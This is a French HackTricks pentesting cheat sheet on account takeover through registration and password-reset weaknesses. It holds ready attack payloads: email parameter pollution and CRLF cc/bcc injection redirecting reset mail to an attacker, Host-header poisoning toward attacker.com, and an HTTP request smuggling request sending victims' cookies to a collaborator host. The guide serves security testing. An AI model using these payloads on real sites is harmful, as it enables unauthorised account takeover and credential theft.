hacktricks/pentesting-web/registration-vulnerabilities.md

# Vulnérabilités d'Enregistrement & de Prise de Contrôle

<details>

<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Autres moyens de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Prise de Contrôle d'Enregistrement

### Enregistrement en Double

* Essayez de vous enregistrer en utilisant un nom d'utilisateur existant
* Vérifiez en variant l'email :
  * majuscules
  * \+1@
  * ajoutez des espaces dans l'email
  * caractères spéciaux dans le nom de l'email (%00, %09, %20)
  * Mettez des caractères noirs après l'email : `test@test.com a`
  * victim@gmail.com@attacker.com
  * victim@attacker.com@gmail.com

### Énumération de Noms d'Utilisateur

Vérifiez si vous pouvez déterminer quand un nom d'utilisateur a déjà été enregistré dans l'application.

### Politique de Mot de Passe

Lors de la création d'un utilisateur, vérifiez la politique de mot de passe (vérifiez si vous pouvez utiliser des mots de passe faibles).\
Dans ce cas, vous pourriez essayer de forcer brutalement les identifiants.

### Injection SQL

[**Consultez cette page**](sql-injection/#insert-statement) pour apprendre comment tenter des prises de contrôle de compte ou extraire des informations via des **Injections SQL** dans les formulaires d'enregistrement.

### Prises de Contrôle Oauth

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### Vulnérabilités SAML

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### Changement d'Email

Lorsque vous êtes enregistré, essayez de changer l'email et vérifiez si ce changement est correctement validé ou si vous pouvez le changer pour des emails arbitraires.

### Autres Vérifications

* Vérifiez si vous pouvez utiliser des **emails jetables**
* Un **mot de passe long** (>200) peut entraîner un **DoS**
* **Vérifiez les limites de taux de création de compte**
* Utilisez username@**burp\_collab**.net et analysez le **callback**

## **Prise de Contrôle de Réinitialisation de Mot de Passe**

### Fuite de Token de Réinitialisation de Mot de Passe Via le Référent <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Demandez la réinitialisation du mot de passe à votre adresse email
2. Cliquez sur le lien de réinitialisation du mot de passe
3. Ne changez pas le mot de passe
4. Cliquez sur des sites tiers (par exemple : Facebook, Twitter)
5. Interceptez la requête dans le proxy Burp Suite
6. Vérifiez si l'en-tête du référent divulgue le token de réinitialisation du mot de passe.

### Empoisonnement de Réinitialisation de Mot de Passe <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Interceptez la requête de réinitialisation du mot de passe dans Burp Suite
2. Ajoutez ou modifiez les en-têtes suivants dans Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Transmettez la requête avec l'en-tête modifié\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Recherchez une URL de réinitialisation de mot de passe basée sur l'_en-tête host_ comme : `https://attacker.com/reset-password.php?token=TOKEN`

### Réinitialisation de Mot de Passe Via le Paramètre Email <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR sur les paramètres de l'API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. L'attaquant doit se connecter avec son compte et accéder à la fonctionnalité **Changer de mot de passe**.
2. Démarrer Burp Suite et intercepter la requête.
3. L'envoyer à l'onglet répéteur et modifier les paramètres : ID utilisateur/email\
`powershell POST /api/changepass [...] ("form": {"email":"victime@email.com","password":"motdepassefiable"})`

### Jeton de réinitialisation de mot de passe faible <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Le jeton de réinitialisation de mot de passe doit être généré aléatoirement et être unique à chaque fois.\
Essayez de déterminer si le jeton expire ou s'il est toujours le même, dans certains cas l'algorithme de génération est faible et peut être deviné. Les variables suivantes pourraient être utilisées par l'algorithme.

* Horodatage
* UserID
* Email de l'utilisateur
* Prénom et Nom
* Date de naissance
* Cryptographie
* Numérique uniquement
* Petite séquence de jetons (caractères entre \[A-Z,a-z,0-9])
* Réutilisation du jeton
* Date d'expiration du jeton

### Fuite du jeton de réinitialisation de mot de passe <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Déclenchez une demande de réinitialisation de mot de passe en utilisant l'API/UI pour un email spécifique, par exemple : test@mail.com
2. Inspectez la réponse du serveur et vérifiez la présence de `resetToken`
3. Utilisez ensuite le jeton dans une URL comme `https://exemple.com/v3/user/password/reset?resetToken=[LE_JETON_DE_REINITIALISATION]&email=[L_EMAIL]`

### Réinitialisation du mot de passe via collision de noms d'utilisateur <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Inscrivez-vous sur le système avec un nom d'utilisateur identique à celui de la victime, mais avec des espaces insérés avant et/ou après le nom d'utilisateur, par exemple : `"admin "`
2. Demandez une réinitialisation de mot de passe avec votre nom d'utilisateur malveillant.
3. Utilisez le jeton envoyé à votre email et réinitialisez le mot de passe de la victime.
4. Connectez-vous au compte de la victime avec le nouveau mot de passe.

La plateforme CTFd était vulnérable à cette attaque.\
Voir : [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Prise de contrôle de compte via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Trouvez un XSS à l'intérieur de l'application ou d'un sous-domaine si les cookies sont limités au domaine parent : `*.domain.com`
2. Fuitez le **cookie de session** actuel
3. Authentifiez-vous en tant qu'utilisateur en utilisant le cookie

### Prise de contrôle de compte via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Utilisez **smuggler** pour détecter le type de HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Préparez une requête qui écrasera le `POST / HTTP/1.1` avec les données suivantes :\
`GET http://quelquechose.burpcollaborator.net HTTP/1.1 X:` dans le but de rediriger les victimes vers burpcollab et de voler leurs cookies\
3\. La requête finale pourrait ressembler à ce qui suit
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Hackerone signale l'exploitation de ce bogue
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### Prise de contrôle de compte via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Créez un payload pour le CSRF, par exemple : "Formulaire HTML avec soumission automatique pour un changement de mot de passe"
2. Envoyez le payload

### Prise de contrôle de compte via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

Le JSON Web Token peut être utilisé pour authentifier un utilisateur.

* Modifiez le JWT avec un autre ID utilisateur / Email
* Vérifiez la faiblesse de la signature JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## Références

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)

<details>

<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Autres moyens de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>